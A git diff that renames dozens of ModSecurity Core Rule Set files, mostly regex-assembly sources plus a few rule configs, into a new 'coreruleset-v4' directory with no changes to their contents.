diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934100.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934100.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934100.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934100.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934101.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934101.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934101.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934101.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934120.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934120.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934120.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934140.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934140.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934140.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934140.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934150.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934150.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934150.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934160.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934160.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934160.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/934170.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934170.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/934170.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/934170.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941130.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941130.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941130.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941160.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941160.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941160.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941160.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941210.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941210.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941210.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941220.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941220.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941220.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941220.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/941390.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941390.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/941390.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/941390.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942120.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942120.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942120.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942120.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942130.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942130.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942130.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942131.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942131.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942131.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942131.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942140.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942140.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942140.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942140.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942150.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942150.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942150.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942151.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942151.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942151.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942151.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942152.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942152.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942152.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942152.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942170.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942170.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942170.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942170.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942180.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942180.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942180.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942180.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942190.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942190.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942190.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942190.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942200.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942200.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942200.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942200.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942210.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942210.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942210.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942210.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942230.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942230.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942230.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942240.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942240.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942240.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942260.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942260.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942260.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942260.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942280.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942280.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942280.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942280.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942290.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942290.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942290.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942290.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942300.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942300.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942300.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942300.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942310.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942310.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942310.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942310.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942320.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942320.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942320.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942320.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942321.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942321.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942321.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942321.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942330.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942330.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942330.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942330.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942340.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942340.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942340.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942340.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942350.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942350.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942350.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942350.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942360.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942360.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942360.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942360.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942362.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942362.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942362.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942362.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942370.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942370.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942370.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942370.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942380.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942380.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942380.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942380.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942390.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942390.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942390.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942390.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942400.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942400.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942400.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942400.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942410.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942410.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942410.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942410.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942440-chain1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440-chain1.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942440-chain1.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440-chain1.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942440.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942440.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942440.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942470.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942470.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942470.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942470.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942480.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942480.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942480.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942480.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942500.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942500.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942500.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942500.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942520.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942520.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942520.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942520.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942521.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942521.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942521.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942521.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942540.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942540.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942540.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942540.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942550.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942550.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942550.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942550.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/942560.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942560.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/942560.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/942560.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944150.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944150.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944150.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944150.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944151.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944151.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944151.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944151.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/944152.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944152.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/944152.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/944152.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/951230.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951230.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/951230.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951230.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/951240.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951240.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/951240.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/951240.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1-curated.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl1.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl1.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2-start-of-string.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-pl2.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-pl2.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-useragents.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-useragents.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/unix-shell-fps-useragents.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-useragents.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/windows-commands-fps.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/windows-commands-fps.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/windows-commands-fps.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/windows-commands-fps.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/932130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/932130.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/932130.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/932130.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/allowed-charsets.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/allowed-charsets.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/allowed-charsets.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/allowed-charsets.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification-no-anchors.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification-no-anchors.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification-no-anchors.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification-no-anchors.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/js-truthy-values.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/js-truthy-values.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/js-truthy-values.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/js-truthy-values.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-function-names.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-function-names.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-function-names.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-function-names.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-4andup.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-4andup.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-4andup.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-4andup.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix.ra
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix.ra
rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix.ra
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-pl3.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-pl3.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-pl3.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-pl3.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-upto3.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-upto3.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-upto3.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-upto3.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/url-schemes.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/url-schemes.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/url-schemes.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/url-schemes.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands-prefix.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands-prefix.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands-prefix.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands-prefix.ra 
diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/toolchain.yaml b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/toolchain.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/toolchain.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/toolchain.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-901-INITIALIZATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-901-INITIALIZATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-901-INITIALIZATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-901-INITIALIZATION.conf 
diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-905-COMMON-EXCEPTIONS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-905-COMMON-EXCEPTIONS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-905-COMMON-EXCEPTIONS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-911-METHOD-ENFORCEMENT.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-911-METHOD-ENFORCEMENT.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-911-METHOD-ENFORCEMENT.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-913-SCANNER-DETECTION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-913-SCANNER-DETECTION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-913-SCANNER-DETECTION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-913-SCANNER-DETECTION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf 
